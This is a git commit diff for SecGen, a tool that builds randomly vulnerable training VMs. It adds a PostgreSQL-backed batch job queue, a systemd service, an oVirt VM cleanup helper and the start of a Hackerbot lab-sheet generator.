hackerbot merge - includes lots of other changes

This commit is contained in:
thomashaw
2018-02-08 13:14:20 +00:00
parent 89263d28a7
commit 6045c1f187
1301 changed files with 127929 additions and 581 deletions

5
.gitignore vendored
View File

@@ -4,5 +4,6 @@ unusedcode
.idea
mount
log
batch/failed/
batch/successful/
.directory
batch/failed
batch/successful

View File

@@ -14,6 +14,11 @@ gem 'sshkey'
gem 'zipruby'
gem 'credy'
gem 'pg'
gem 'cinch'
gem 'nori'
gem 'programr', :git => "http://github.com/robertjwhitney/programr.git"
gem 'process_helper'
gem 'ovirt-engine-sdk'
#development only gems go here
group :test, :development do

View File

@@ -1,8 +1,15 @@
GIT
remote: http://github.com/robertjwhitney/programr.git
revision: 9885f3870407f57c3e2ca1fe644ed10573629ca6
specs:
programr (0.0.2)
GEM
remote: https://rubygems.org/
specs:
CFPropertyList (2.2.8)
chunky_png (1.3.8)
cinch (2.3.3)
credy (0.2.1)
thor (~> 0.19.1)
facter (2.4.6)
@@ -35,8 +42,12 @@ GEM
nokogiri (1.6.8)
mini_portile2 (~> 2.1.0)
pkg-config (~> 1.1.7)
nori (2.6.0)
ovirt-engine-sdk (4.1.8)
json
pg (0.21.0)
pkg-config (1.1.7)
process_helper (0.1.1)
puppet (4.5.1)
CFPropertyList (~> 2.2.6)
facter (> 2.0, < 4)
@@ -69,6 +80,7 @@ PLATFORMS
ruby
DEPENDENCIES
cinch
credy
faker
forgery
@@ -76,7 +88,11 @@ DEPENDENCIES
mini_exiftool_vendored
minitest
nokogiri
nori
ovirt-engine-sdk
pg
process_helper
programr!
puppet
rake
rdoc
@@ -89,4 +105,4 @@ DEPENDENCIES
zipruby
BUNDLED WITH
1.14.3
1.15.4

View File

@@ -3,9 +3,10 @@
## Summary
SecGen creates vulnerable virtual machines so students can learn security penetration testing techniques.
Boxes like Metasploitable2 are always the same, this project uses Vagrant, Puppet, and Ruby to quickly create randomly vulnerable virtual machines that can be used for learning or for hosting CTF events.
Boxes like Metasploitable2 are always the same, this project uses Vagrant, Puppet, and Ruby to create randomly vulnerable virtual machines that can be used for learning or for hosting CTF events.
[The latest version is available at: http://github.com/cliffe/SecGen/](http://github.com/cliffe/SecGen/)
[The latest version is available at: http://github.com/cliffe/SecGen/](http://github.com/cliffe/SecGen/)
## Introduction
Computer security students benefit from engaging in hacking challenges. Practical lab work and pre-configured hacking challenges are common practice both in security education and also as a pastime for security-minded individuals. Competitive hacking challenges, such as capture the flag (CTF) competitions have become a mainstay at industry conferences and are the focus of large online communities. Virtual machines (VMs) provide an effective way of sharing targets for hacking, and can be designed in order to test the skills of the attacker. Websites such as Vulnhub host pre-configured hacking challenge VMs and are a valuable resource for those learning and advancing their skills in computer security. However, developing these hacking challenges is time consuming, and once created, essentially static. That is, once the challenge has been "solved" there is no remaining challenge for the student, and if the challenge is created for a competition or assessment, the challenge cannot be reused without risking plagiarism, and collusion.
@@ -22,32 +23,32 @@ SecGen contains modules, which install various software packages. Each SecGen mo
SecGen is developed and tested on Ubuntu Linux. In theory, SecGen should run on Mac or Windows, if you have all the required software installed.
You will need to install the following:
- Ruby (development): https://www.ruby-lang.org/en/
- Ruby (development): https://www.ruby-lang.org/en/
- Vagrant: http://www.vagrantup.com/
- Virtual Box: https://www.virtualbox.org/
- Puppet: http://puppet.com/
- Packer: https://www.packer.io/downloads.html
- Packer: https://www.packer.io/
- ImageMagick: https://www.imagemagick.org/
- And the required Ruby Gems (including Nokogiri and Librarian-puppet)
### On Ubuntu these commands will get you up and running
Install all the required packages:
```bash
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev build-essential patch virtualbox ruby-bundler vagrant imagemagick libmagickwand-dev exiftool libpq-dev
# install a recent version of vagrant
wget https://releases.hashicorp.com/vagrant/1.9.8/vagrant_1.9.8_x86_64.deb
sudo apt install ./vagrant_1.9.8_x86_64.deb
# install other required packages via repos
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev build-essential patch virtualbox ruby-bundler imagemagick libmagickwand-dev exiftool libpq-dev
```
Copy SecGen to a directory of your choosing, such as */home/user/bin/SecGen*, then:
Copy SecGen to a directory of your choosing, such as */home/user/bin/SecGen*
Then install gems:
```bash
cd /home/user/bin/SecGen
bundle install
```
## Optional software requirements
### EWF image creation
To generate forensic images in the EWF image format FTK Imager command line is required.
Download link for FTK Imager command line: http://accessdata.com/product-download/
Note: The FTK Imager executable needs to be added to the PATH environment variable.
## Usage
Basic usage:
```bash
@@ -426,6 +427,9 @@ It is also possible to iterate through a datastore, and feed each value into sep
Some generators generate structured content in JSON format, for example the organisation type. It is possible to access a particular element of structured data from a datastore with the access_json using the ruby hash lookup format. See the example scenario:
```scenarios/examples/datastore_examples/json_selection_example.xml```
Some scenarios require VMs IP addresses to be used as parameters for other modules in the scenario. If this is the case, you should use the 'IP_addresses' datastore to store the IPs for all VMs in the scenario and use the access functionality to pass them into network modules.For example:
```scenarios/examples/datastore_examples/network_ip_datastore_example.xml```
## Modules
SecGen is designed to be easily extendable with modules that define vulnerabilities and other kinds of software, configuration, and content changes.

103
lib/batch/README.md Normal file
View File

@@ -0,0 +1,103 @@
# Batch Processing with SecGen
Generating multiple VMs in a batch is now possible through the use of batch_secgen, a ruby script which uses postgresql
as a job queue to mass-create VMs with SecGen.
There are helper commands available to add jobs, list jobs in the table, remove jobs, and reset the status of jobs from 'running' or 'error' to 'todo'.
When adding multiple jobs to the queue, it is possible to prefix the VM names with unique strings.
The example below demonstrates adding 3 copies of the flawed_fortress scenario, which results in the VM names being prefixed with 'tom_', 'cliffe_', and 'aimee_'.
```
ruby batch_secgen.rb add --instances tom,cliffe,aimee --- -s scenarios/ctf/flawed_fortress_1.xml r
```
## Initialise the Database
Install postgresql
```
sudo apt-get install postgresql
```
Add the database user role and give the user database superuser permissions.
```
sudo -u postgres createuser <username>
sudo -u postgres psql -c "CREATE ROLE <username> superuser;"
```
Create the database
```
sudo -u postgres createdb batch_secgen
```
Replace 'username' within the lib/batch/batch_secgen.sql dump with your database username on lines 131 and 141
```
...
128: REVOKE ALL ON TABLE queue FROM PUBLIC;
129: REVOKE ALL ON TABLE queue FROM postgres;
130: GRANT ALL ON TABLE queue TO postgres;
131: GRANT ALL ON TABLE queue TO username; # << replace with database username
...
138: REVOKE ALL ON SEQUENCE queue_id_seq FROM PUBLIC;
139: REVOKE ALL ON SEQUENCE queue_id_seq FROM postgres;
140: GRANT ALL ON SEQUENCE queue_id_seq TO postgres;
141: GRANT SELECT,USAGE ON SEQUENCE queue_id_seq TO username; # << replace with database username
...
```
Import the modified SQL file
```
psql -U <username> batch_secgen < lib/batch/batch_secgen.sql
```
## Using secgen-batch.rb
COMMANDS:
add, a: Adds a job to the queue
start: Starts the service, works through the job queue
reset: Resets jobs in the table to 'todo' status based on option
delete: Delete job(s) from the queue table
list: Lists the current entries in the job queue
OPTIONS:
[add]
--instances [integer n]: Number of instances of the scenario to create with default project naming format
--instances [prefix,prefix, ...]: Alternatively supply a comma separated list of strings to prefix to project output
--randomise-ips [integer n ](optional): Randomises the IP range 10.X.X.0, unique for all instances,
requires the number of unique static network tags in the scenario.xml
---: Delimiter, anything after this will be passed to secgen.rb as an argument.
Example: `ruby batch_secgen.rb add --instances here,are,some,prefixes --- -s scenarios/default_scenario.xml run`
[start]
--max_threads [integer n] (optional): Maximum number of worker threads, defaults to 1
[reset]
--running: Reset all 'running' jobs to 'todo'
--failed / --error: Reset all failed (i.e. status => 'error') jobs to 'todo'
[delete]
--id [integer n]: Delete the entry for a specific Job ID
--all: Delete all jobs from the queue table
[list]
--id [integer n] (optional): List the entry for a specific Job ID
--all: List all jobs in the queue table
[misc]
--help, -h: Shows this usage information
## Install the service to run batch-secgen in the background
Install the lib/batch/batch-secgen.service systemd service file.
```
sudo systemctl enable /absolute/path/to/SecGen/lib/batch/batch-secgen.service
service batch-secgen start
```

View File

@@ -0,0 +1,16 @@
[Unit]
Description=Batch Processing Service (SecGen Project)
After=postgresql.service
[Service]
EnvironmentFile=/etc/environment
ExecStart=/usr/bin/ruby /home/secgen/SecGen/lib/batch/batch_secgen.rb start
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
WorkingDirectory=/home/secgen/SecGen/
Restart=always
User=secgen
Group=secgen
[Install]
WantedBy=multi-user.target

View File

@@ -1,3 +1,4 @@
require 'fileutils'
require 'getoptlong'
require 'open3'
require 'pg'
@@ -6,8 +7,10 @@ require_relative '../helpers/print.rb'
require_relative '../helpers/constants.rb'
# Globals
@db_conn = nil
@status_enum = {:todo => 'todo', :running => 'running', :success => 'success', :error => 'error', :failed => 'error'}
@prepared_statements = []
@secgen_args = ''
@ranges_in_table = nil
# Displays secgen_batch usage data
def usage
@@ -17,8 +20,9 @@ def usage
COMMANDS:
add, a: Adds a job to the queue
start: Starts the service, works through the job queue
list: Lists the current entries in the job queue
reset: Resets jobs in the table to 'todo' status based on option
delete: Delete job(s) from the queue table
list: Lists the current entries in the job queue
OPTIONS:
[add]
@@ -32,14 +36,22 @@ def usage
[start]
--max_threads [integer n] (optional): Maximum number of worker threads, defaults to 1
[list]
--id [integer n] (optional): List the entry for a specific Job ID
--all: List all jobs in the queue table
[reset]
--running: Reset all 'running' jobs to 'todo'
--failed / --error: Reset all failed (i.e. status => 'error') jobs to 'todo'
[delete]
--id [integer n]: Delete the entry for a specific Job ID
--all: Delete all jobs from the queue table
[list]
--all (default): List all jobs in the queue table
--id [integer n] (optional): List the entry for a specific Job ID
--todo (optional): List jobs with status 'todo'
--running (optional): List jobs with status 'running'
--success (optional): List jobs with status 'success'
--failed / --error (optional): List jobs with status 'error'
[misc]
--help, -h: Shows this usage information
@@ -70,15 +82,34 @@ end
def get_list_opts
list_options = misc_opts + [['--id', GetoptLong::REQUIRED_ARGUMENT],
['--all', GetoptLong::OPTIONAL_ARGUMENT]]
['--all', GetoptLong::OPTIONAL_ARGUMENT],
['--todo', GetoptLong::NO_ARGUMENT],
['--running', GetoptLong::NO_ARGUMENT],
['--success', GetoptLong::NO_ARGUMENT],
['--failed', '--error', GetoptLong::NO_ARGUMENT]]
parse_opts(GetoptLong.new(*list_options))
end
def get_reset_opts
list_options = misc_opts + [['--all', GetoptLong::NO_ARGUMENT],
['--running', GetoptLong::NO_ARGUMENT],
['--failed', '--error', GetoptLong::NO_ARGUMENT]]
options = parse_opts(GetoptLong.new(*list_options))
if !options[:running] and !options[:failed] and !options[:all]
Print.err 'Error: The reset command requires an argument.'
usage
else
options
end
end
def get_delete_opts
delete_options = misc_opts + [['--id', GetoptLong::REQUIRED_ARGUMENT],
['--all', GetoptLong::OPTIONAL_ARGUMENT]]
['--all', GetoptLong::OPTIONAL_ARGUMENT],
['--failed', GetoptLong::OPTIONAL_ARGUMENT]]
options = parse_opts(GetoptLong.new(*delete_options))
if options[:id] == '' and options[:all] == false
if !options[:id] and !options[:all] and !options[:failed]
Print.err 'Error: The delete command requires an argument.'
usage
else
@@ -87,7 +118,7 @@ def get_delete_opts
end
def parse_opts(opts)
options = {:instances => '', :max_threads => 1, :id => '', :all => false}
options = {:instances => '', :max_threads => 3, :id => nil, :all => false}
opts.each do |opt, arg|
case opt
when '--instances'
@@ -100,6 +131,14 @@ def parse_opts(opts)
options[:random_ips] = arg.to_i
when '--all'
options[:all] = true
when '--todo'
options[:todo] = true
when '--running'
options[:running] = true
when '--success'
options[:success] = true
when '--failed'
options[:failed] = true
else
Print.err 'Invalid argument'
exit(false)
@@ -111,164 +150,295 @@ end
# Command Functions
def add(options)
db_conn = PG::Connection.open(:dbname => 'batch_secgen')
# Handle --instances
instances = options[:instances]
if (instances.to_i.to_s == instances) and instances.to_i > 1
if (instances.to_i.to_s == instances) and instances.to_i >= 1
instances.to_i.times do |count|
instance_args = "--prefix batch_job_#{(count+1).to_s} " + @secgen_args
instance_args = generate_range_arg(options) + instance_args
insert_row(count.to_s, instance_args)
instance_args = generate_range_arg(db_conn, options) + instance_args
insert_row(db_conn, @prepared_statements, count.to_s, instance_args)
end
elsif instances.include?(',')
elsif instances.size > 0
named_prefixes = instances.split(',')
named_prefixes.each_with_index do |named_prefix, count|
instance_secgen_args = "--prefix #{named_prefix} " + @secgen_args
instance_secgen_args = generate_range_arg(options) + instance_secgen_args
insert_row(count.to_s, instance_secgen_args)
instance_secgen_args = generate_range_arg(db_conn, options) + instance_secgen_args
insert_row(db_conn, @prepared_statements, count.to_s, instance_secgen_args)
end
else
insert_row('batch_job_1', @secgen_args)
end
db_conn.finish
end
def start(options)
# Start in SecGen's ROOT_DIR
Dir.chdir ROOT_DIR
# Create directories
Dir.mkdir 'log' unless Dir.exists? 'log'
FileUtils.mkdir_p 'batch/successful' unless Dir.exists? 'batch/successful'
FileUtils.mkdir_p 'batch/failed' unless Dir.exists? 'batch/failed'
# Start the service and call secgen.rb
current_threads = []
outer_loop_db_conn = PG::Connection.open(:dbname => 'batch_secgen')
while true
if (get_jobs.size > 0) and (current_threads.size < options[:max_threads].to_i)
if (get_jobs(outer_loop_db_conn, @prepared_statements).size > 0) and (current_threads.size < options[:max_threads].to_i)
current_threads << Thread.new {
current_job = get_jobs[0]
db_conn = PG::Connection.open(:dbname => 'batch_secgen')
threadwide_statements = []
current_job = get_jobs(db_conn, threadwide_statements)[0]
job_id = current_job['id']
update_status(job_id, :running)
update_status(db_conn, threadwide_statements, job_id, :running)
secgen_args = current_job['secgen_args']
# execute secgen
puts "Running job_id(#{job_id}): secgen.rb #{secgen_args}"
stdout, stderr, status = Open3.capture3("ruby secgen.rb #{secgen_args}")
puts "Job #{job_id} Complete"
# Update job status and back-up paths
if status.exitstatus == 0
update_status(job_id, :success)
puts "Job #{job_id} Complete: successful"
update_status(db_conn, threadwide_statements, job_id, :success)
log_prefix = ''
backup_path = 'batch/successful/'
else
update_status(job_id, :error)
puts "Job #{job_id} Complete: failed"
update_status(db_conn, threadwide_statements, job_id, :error)
log_prefix = 'ERROR_'
backup_path = 'batch/failed/'
end
# Get project data from SecGen output
project_id = project_path = 'unknown'
stderr_project_split = stdout.split('Creating project: ')
if stderr_project_split.size > 1
project_path = stderr_project_split[1].split('...')[0]
project_id = project_path.split('projects/')[1]
else
project_id = "job_#{job_id}"
Print.err(stderr)
Print.err("Fatal error on job #{job_id}: SecGen crashed before project creation.")
Print.err('Check your scenario file.')
end
# Log output
Dir.mkdir 'log' unless Dir.exists? 'log'
project_path = stdout.split('Creating project: ')[1].split('...')[0]
project_id = project_path.split('projects/')[1]
log = File.new("log/#{log_prefix}#{project_id}", 'w')
log_name = "#{log_prefix}#{project_id}"
log_path = "log/#{log_name}"
log = File.new(log_path, 'w')
log.write("SecGen project path::: #{project_path}\n\n\n")
log.write("SecGen arguments::: #{secgen_args}\n\n\n")
log.write("SecGen output::: \n\n\n")
log.write("SecGen output (stdout)::: \n\n\n")
log.write(stdout)
log.write("\n\n\nGenerator local output::: \n\n\n")
log.write("\n\n\nGenerator local output and errors (stderr)::: \n\n\n")
log.write(stderr)
log.close
# Back up project and log file
FileUtils.cp_r(project_path, backup_path)
FileUtils.cp(log_path, (backup_path + project_id + '/' + log_name))
db_conn.finish
}
sleep(1)
sleep(5)
else
current_threads.delete_if { |thread| !thread.alive? }
sleep(2) # don't use a busy-waiting loop, choose a blocking sleep that frees up CPU
sleep(5) # don't use a busy-waiting loop, choose a blocking sleep that frees up CPU
end
end
end
def list(options)
if options[:id] == ''
items = select_all
items.each do |row|
Print.info row
end
else
Print.info select_id(options[:id])
db_conn = PG::Connection.open(:dbname => 'batch_secgen')
if options[:id]
items = [select_id(db_conn, @prepared_statements, options[:id])]
elsif options[:todo]
items = select_status(db_conn, @prepared_statements, :todo)
elsif options[:running]
items = select_status(db_conn, @prepared_statements, :running)
elsif options[:success]
items = select_status(db_conn, @prepared_statements, :success)
elsif options[:failed]
items = select_status(db_conn, @prepared_statements, :failed)
else #all
items = select_all(db_conn)
end
items.each do |row|
Print.info row
end
db_conn.finish
end
# reset jobs in batch to status => 'todo'
def reset(options)
db_conn = PG::Connection.open(:dbname => 'batch_secgen')
if options[:all]
update_all_to_status(db_conn, @prepared_statements, :todo)
end
if options[:running]
update_all_by_status(db_conn, @prepared_statements, :running, :todo)
end
if options[:failed]
update_all_by_status(db_conn, @prepared_statements, :error, :todo)
end
db_conn.finish
end
def delete(options)
if options[:id] != ''
delete_id(options[:id])
db_conn = PG::Connection.open(:dbname => 'batch_secgen')
if options[:id]
delete_id(db_conn, @prepared_statements, options[:id])
elsif options[:failed]
delete_failed(db_conn)
elsif options[:all]
delete_all
delete_all(db_conn)
end
end
def get_jobs
select_all_todo.to_a
db_conn.finish
end
# Database interactions
def insert_row(statement_id, secgen_args)
def insert_row(db_conn, prepared_statements, statement_id, secgen_args)
statement = "insert_row_#{statement_id}"
# Add --shutdown and strip trailing whitespace
secgen_args = '--shutdown ' + secgen_args.strip
Print.info "Adding to queue: '#{statement}' '#{secgen_args}' 'todo'"
@db_conn.prepare(statement, 'insert into queue (secgen_args, status) values ($1, $2)')
@db_conn.exec_prepared(statement, [secgen_args, 'todo'])
unless prepared_statements.include? statement
db_conn.prepare(statement, 'insert into queue (secgen_args, status) values ($1, $2)')
prepared_statements << statement
end
db_conn.exec_prepared(statement, [secgen_args, 'todo'])
end
def select_all
@db_conn.exec_params('SELECT * FROM queue;')
def select_all(db_conn)
db_conn.exec_params('SELECT * FROM queue;')
end
def select_all_todo
@db_conn.exec_params("SELECT * FROM queue where status = 'todo';")
def select_status(db_conn, prepared_statements, status)
statement = "select_status_#{status}"
unless prepared_statements.include? statement
db_conn.prepare(statement, 'SELECT * FROM queue where status = $1;')
prepared_statements << statement
end
db_conn.exec_prepared(statement, [@status_enum[status]])
end
def select_id(id)
def select_id(db_conn, prepared_statements, id)
statement = "select_id_#{id}"
@db_conn.prepare(statement, 'SELECT * FROM queue where id = $1;')
@db_conn.exec_prepared(statement, [id]).first
unless prepared_statements.include? statement
db_conn.prepare(statement, 'SELECT * FROM queue where id = $1;')
prepared_statements << statement
end
db_conn.exec_prepared(statement, [id]).first
end
def update_status(job_id, status)
status_enum = {:todo => 'todo', :running => 'running', :success => 'success', :error => 'error'}
def update_status(db_conn, prepared_statements, job_id, status)
statement = "update_status_#{job_id}_#{status}"
@db_conn.prepare(statement, 'UPDATE queue SET status = $1 WHERE id = $2')
@db_conn.exec_prepared(statement,[status_enum[status], job_id])
unless prepared_statements.include? statement
db_conn.prepare(statement, 'UPDATE queue SET status = $1 WHERE id = $2')
prepared_statements << statement
end
db_conn.exec_prepared(statement, [@status_enum[status], job_id])
end
def delete_all
Print.info 'Are you sure you want to DELETE all jobs from the queue table? [y/N]'
def update_all_by_status(db_conn, prepared_statements, from_status, to_status)
statement = "mass_update_status_#{from_status}_#{to_status}"
unless prepared_statements.include? statement
db_conn.prepare(statement, 'UPDATE queue SET status = $1 WHERE status = $2')
prepared_statements << statement
end
db_conn.exec_prepared(statement, [@status_enum[to_status], @status_enum[from_status]])
end
def update_all_to_status(db_conn, prepared_statements, to_status)
statement = "mass_update_to_status_#{to_status}"
unless prepared_statements.include? statement
db_conn.prepare(statement, 'UPDATE queue SET status = $1')
prepared_statements << statement
end
db_conn.exec_prepared(statement, [@status_enum[to_status]])
end
def delete_failed(db_conn)
Print.info 'Are you sure you want to DELETE failed jobs from the queue table? [y/N]'
input = STDIN.gets.chomp
if input == 'Y' or input == 'y'
Print.info 'Deleting all jobs from Queue table'
@db_conn.exec_params('DELETE FROM queue;')
Print.info "'Deleting all jobs with status == 'error' from Queue table"
db_conn.exec_params("DELETE FROM queue WHERE status = 'error';")
else
exit
end
end
def delete_id(id)
Print.info "Deleting job_id: #{id}"
statement = "delete_job_id_#{id}"
@db_conn.prepare(statement, 'DELETE FROM queue where id = $1')
@db_conn.exec_prepared(statement, [id])
def delete_all(db_conn)
Print.info 'Are you sure you want to DELETE all jobs from the queue table? [y/N]'
input = STDIN.gets.chomp
if input == 'Y' or input == 'y'
Print.info 'Deleting all jobs from Queue table'
db_conn.exec_params('DELETE FROM queue;')
else
exit
end
end
def generate_range_arg(options)
def delete_id(db_conn, prepared_statements, id)
Print.info "Deleting job_id: #{id}"
statement = "delete_job_id_#{id}"
unless prepared_statements.include? statement
db_conn.prepare(statement, 'DELETE FROM queue where id = $1')
prepared_statements << statement
end
db_conn.exec_prepared(statement, [id])
end
def get_jobs(db_conn, prepared_statements)
select_status(db_conn, prepared_statements, :todo).to_a
end
def secgen_arg_network_ranges(secgen_args)
ranges_in_arg = []
split_args = secgen_args.split(' ')
network_ranges_index = split_args.find_index('--network-ranges')
if network_ranges_index != nil
range = split_args[network_ranges_index + 1]
if range.include?(',')
range.split(',').each { |split_range| ranges_in_arg << split_range }
else
ranges_in_arg << range
end
end
ranges_in_arg
end
def generate_range_arg(db_conn, options)
range_arg = ''
if options.has_key? :random_ips
network_ranges = []
# Check if there are jobs in the DB containing ips. Assign once so that repeated calls don't get added to the list.
if @ranges_in_table == nil
@ranges_in_table = []
# Exclude IP ranges previously selected, stored in the table
table_entries = select_all(db_conn)
table_entries.each { |job|
@ranges_in_table += secgen_arg_network_ranges(job['secgen_args'])
}
end
generated_network_ranges = []
scenario_networks_qty = options[:random_ips]
scenario_networks_qty.times {
range = generate_range
# Check for uniqueness
while network_ranges.include?(range)
while @ranges_in_table.include?(range)
range = generate_range
end
network_ranges << range
@ranges_in_table << range
generated_network_ranges << range
}
random_ip_string = network_ranges.join(',')
random_ip_string = generated_network_ranges.join(',')
range_arg = "--network-ranges #{random_ip_string} "
end
range_arg
@@ -282,9 +452,6 @@ Print.std '~'*47
Print.std 'SecGen Batch - Batch VM Generation Service'
Print.std '~'*47
# Connect to database
@db_conn = PG::Connection.open(:dbname => 'batch_secgen')
# Capture SecGen options
delimiter_index = ARGV.find_index('---')
if delimiter_index
@@ -305,8 +472,10 @@ case ARGV[0]
start(get_start_opts)
when 'list'
list(get_list_opts)
when 'reset'
reset(get_reset_opts)
when 'delete'
delete(get_delete_opts)
else
usage
end
end

View File

@@ -1,13 +0,0 @@
[Unit]
Description=Batch Processing Service (SecGen Project)
After=postgresql.service
[Service]
ExecStart=/usr/bin/ruby /opt/secgen/lib/batch/batch_secgen.rb
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
WorkingDirectory=/opt/secgen
Restart=always
[Install]
WantedBy=multi-user.target

View File

@@ -1,4 +1,5 @@
require 'rubygems'
require 'process_helper'
class GemExec
@@ -8,8 +9,8 @@ class GemExec
# @param [Object] gem_name -- such as 'vagrant', 'puppet', 'librarian-puppet'
# @param [Object] working_dir -- the location for output
# @param [Object] argument -- the command to send 'init', 'install'
def self.exe(gem_name, working_dir, argument)
Print.std "Loading #{gem_name} (#{argument}) in #{working_dir}"
def self.exe(gem_name, working_dir, arguments)
Print.std "Loading #{gem_name} (#{arguments}) in #{working_dir}"
version = '>= 0'
begin
@@ -36,8 +37,24 @@ class GemExec
end
Dir.chdir(working_dir)
system gem_path, argument
output_hash = {:output => '', :status => 0, :exception => nil}
begin
output_hash[:output] = ProcessHelper.process("#{gem_path} #{arguments}", {:pty => true, :timeout => (60 * 10),
include_output_in_exception: true})
rescue Exception => ex
output_hash[:status] = 1
output_hash[:exception] = ex
if ex.class == ProcessHelper::UnexpectedExitStatusError
output_hash[:output] = ex.to_s.split('Command output: ')[1]
Print.err 'Non-zero exit status...'
elsif ex.class == ProcessHelper::TimeoutError
Print.err 'Timeout: Killing process...'
sleep(30)
output_hash[:output] = ex.to_s.split('Command output prior to timeout: ')[1]
else
output_hash[:output] = nil
end
end
output_hash
end
end

130
lib/helpers/ovirt.rb Normal file
View File

@@ -0,0 +1,130 @@
require 'timeout'
require 'rubygems'
require 'process_helper'
require 'ovirtsdk4'
require_relative './print.rb'
class OVirtFunctions
# Helper for removing VMs which Vagrant lost track of, i.e. exist but are reported as 'have not been created'.
# @param [String] destroy_output_log -- logfile from vagrant destroy process which contains loose VMs
# @param [String] options -- command-line opts, used for building oVirt connection
def self.remove_uncreated_vms(destroy_output_log, options, scenario)
retry_count = 0
max_retries = 5
while retry_count <= max_retries
begin
# Build an ovirt connection
ovirt_connection = get_ovirt_connection(options)
# Determine the oVirt name of the uncreated VMs and Build the oVirt VM names
ovirt_vm_names = build_ovirt_names(scenario, options[:prefix], get_uncreated_vms(destroy_output_log))
ovirt_vm_names.each do |vm_name|
# Find the oVirt VM objects
vms = vms_service(ovirt_connection).list(search: "name=#{vm_name}")
# Shut down and remove the VMs
vms.each do |vm|
begin
Timeout.timeout(60*5) do
while vm_exists(ovirt_connection, vm)
shutdown_vm(ovirt_connection, vm)
remove_vm(ovirt_connection, vm)
end
Print.info 'Successfully removed VM: ' + vm.name + ' -- ID: ' + vm.id
end
rescue Timeout::Error
Print.err "Error: Removal of #{vm.name} timed-out. (ID: #{vm.id})"
next
end
end
end
rescue OvirtSDK4::Error => ex
if retry_count < max_retries
Print.err 'Error: Retrying... #' + (retry_count + 1).to_s + ' of #' + max_retries.to_s
end
retry_count += 1
puts ex
end
end
end
def self.vm_exists(ovirt_connection, vm)
# Check if VM has been removed
begin
service = vms_service(ovirt_connection).vm_service(vm.id)
service.get
return true
rescue OvirtSDK4::Error => err
if err.code == 404
return false
else
puts err
exit(1)
end
end
end
def self.vms_service(ovirt_connection)
ovirt_connection.system_service.vms_service
end
def self.shutdown_vm(ovirt_connection, vm)
service = vms_service(ovirt_connection).vm_service(vm.id)
while service.get.status == 'up'
service.stop
puts 'Stopping VM: ' + vm.name
sleep(15)
end
end
def self.remove_vm(ovirt_connection, vm)
service = vms_service(ovirt_connection).vm_service(vm.id)
begin
service.remove(force: true)
puts 'Removing VM: ' + vm.name
sleep(15)
rescue Exception
# ignore oVirt exception, it gets raised regardless of success / failure
end
end
def self.build_ovirt_names(scenario_path, prefix, vm_names)
ovirt_vm_names = []
scenario_name = scenario_path.split('/').last.split('.').first
prefix = prefix ? (prefix + '-' + scenario_name) : ('SecGen-' + scenario_name)
vm_names.each do |vm_name|
ovirt_vm_names << "#{prefix}-#{vm_name}".tr('_', '-')
end
ovirt_vm_names
end
def self.get_uncreated_vms(output_log)
split = output_log.split('==> ')
failures = []
split.each do |line|
if line.include? ': VM is not created. Please run `vagrant up` first.'
failed_vm = line.split(':').first
failures << failed_vm
end
end
failures.uniq
end
# @param [String] options -- command-line opts, contains oVirt username, password and url
def self.get_ovirt_connection(options)
if options[:ovirtuser] and options[:ovirtpass] and options[:ovirturl]
conn_attr = {}
conn_attr[:url] = options[:ovirturl]
conn_attr[:username] = options[:ovirtuser]
conn_attr[:password] = options[:ovirtpass]
conn_attr[:debug] = true
conn_attr[:insecure] = true
conn_attr[:headers] = {'Filter' => true}
OvirtSDK4::Connection.new(conn_attr)
else
Print.err('Fatal: oVirt connections require values for the --ovirtuser and --ovirtpass command line arguments')
exit(1)
end
end
end

View File

@@ -0,0 +1,114 @@
#!/usr/bin/ruby
require_relative 'local_string_generator.rb'
require 'erb'
require 'fileutils'
require 'redcarpet'
require 'nokogiri'
class HackerbotConfigGenerator < StringGenerator
attr_accessor :accounts
attr_accessor :flags
attr_accessor :root_password
attr_accessor :html_rendered
attr_accessor :html_TOC_rendered
attr_accessor :title
attr_accessor :local_dir
attr_accessor :templates_path
attr_accessor :config_template_path
attr_accessor :html_template_path
def initialize
super
self.module_name = 'Hackerbot Config Generator'
self.title = ''
self.accounts = []
self.flags = []
self.root_password = ''
self.html_rendered = ''
self.html_TOC_rendered = ''
self.local_dir = File.expand_path('../../', __FILE__)
self.templates_path = "#{self.local_dir}/templates/"
self.config_template_path = "#{self.local_dir}/templates/integrity_lab.xml.erb"
self.html_template_path = "#{self.local_dir}/templates/labsheet.html.erb"
end
def get_options_array
super + [['--root_password', GetoptLong::REQUIRED_ARGUMENT],
['--accounts', GetoptLong::REQUIRED_ARGUMENT],
['--flags', GetoptLong::REQUIRED_ARGUMENT]]
end
def process_options(opt, arg)
super
case opt
when '--root_password'
self.root_password << arg;
when '--accounts'
self.accounts << arg;
when '--flags'
self.flags << arg;
end
end
def generate_lab_sheet(xml_config)
lab_sheet = ''
begin
doc = Nokogiri::XML(xml_config)
rescue
Print.err "Failed to process hackerbot config"
exit
end
# remove xml namespaces for ease of processing
doc.remove_namespaces!
# for each element in the vulnerability
hackerbot = doc.xpath("/hackerbot")
name = hackerbot.xpath("name").first.content
lab_sheet += hackerbot.xpath("tutorial_info/tutorial").first.content + "\n"
doc.xpath("//attack").each_with_index do |attack, index|
attack.xpath("tutorial").each do |tutorial_snippet|
lab_sheet += tutorial_snippet.content + "\n"
end
lab_sheet += "#### #{name} Attack ##{index + 1}\n"
lab_sheet += "Use what you have learned to complete the bot's challenge. You can skip the bot to here, by saying '**goto #{index + 1}**'\n\n"
lab_sheet += "> #{name}: \"#{attack.xpath('prompt').first.content}\" \n\n"
lab_sheet += "Do any necessary preparation, then when you are ready for the bot to complete the action/attack, ==say 'ready'==\n\n"
if attack.xpath("quiz").size > 0
lab_sheet += "There is a quiz to complete. Once Hackerbot asks you the question you can =='answer *YOURANSWER*'==\n\n"
end
lab_sheet += "Don't forget to ==save and submit any flags!==\n\n"
end
lab_sheet += hackerbot.xpath("tutorial_info/footer").first.content + "\n"
lab_sheet
end
def generate
# Print.debug self.accounts.to_s
xml_template_out = ERB.new(File.read(self.config_template_path), 0, '<>-')
xml_config = xml_template_out.result(self.get_binding)
lab_sheet_markdown = generate_lab_sheet(xml_config)
redcarpet = Redcarpet::Markdown.new(Redcarpet::Render::HTML.new(prettify:true, hard_wrap: true, with_toc_data: true), footnotes: true, fenced_code_blocks: true, no_intra_emphasis: true, autolink: true, highlight: true, lax_spacing: true, tables: true)
self.html_rendered = redcarpet.render(lab_sheet_markdown).force_encoding('UTF-8')
